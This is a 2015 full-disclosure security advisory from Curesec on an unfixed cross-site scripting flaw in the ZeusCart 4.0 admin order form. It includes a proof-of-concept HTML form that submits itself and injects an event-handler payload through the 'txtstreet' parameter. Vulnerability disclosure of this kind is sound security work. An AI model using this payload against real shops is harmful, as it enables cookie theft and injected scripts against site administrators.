ZeusCart version 4.0 suffers from a cross site scripting vulnerability.
a49dd4dc54a291a941b5050448afff0a8a1e9910a1cc60b6e4989cf537ec3d2f
ZeusCart 4.0: XSS
Security Advisory – Curesec Research Team
1. Introduction
Affected Product: ZeusCart 4.0
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Contact: support@zeuscart.com
Vulnerability Type: XSS
Remote Exploitable: Yes
Reported to vendor: 08/13/2015
Disclosed to public: 09/14/2015
Release mode: Full Disclosure
CVE: n/a
Credits Tim Coen of Curesec GmbH
2. Vulnerability Description
There is an XSS vulnerability via the "txtstreet" POST parameter when
adding a new order. With this, it is possible to steal cookies or inject
JavaScript keyloggers.
2. Proof of Concept
<form name="myform" method="post"
action="http://localhost/zeuscart-master/admin/index.php?do=addUserOrder&action=create"
>
<input type="hidden" name="hidOrderTotal" value="400">
<input type="hidden" name="discount" value="flat">
<input type="hidden" name="selCustomer" value="1">
<input type="hidden" name="payOption" value="8">
<input type="hidden" name="txtname" value="Primary">
<input type="hidden" name="txtstreet" value="foo autofocus
onfocus=alert(1); bar">
</form>
<script>document.myform.submit();</script>
4. Solution
This issue was not fixed by the vendor.
5. Report Timeline
08/13/2015 Informed Vendor about Issue (no reply)
09/07/2015 Reminded Vendor of release date (no reply)
09/14/2015 Disclosed to public
6. Blog Reference:
http://blog.curesec.com/article/blog/ZeusCart-40-XSS-55.html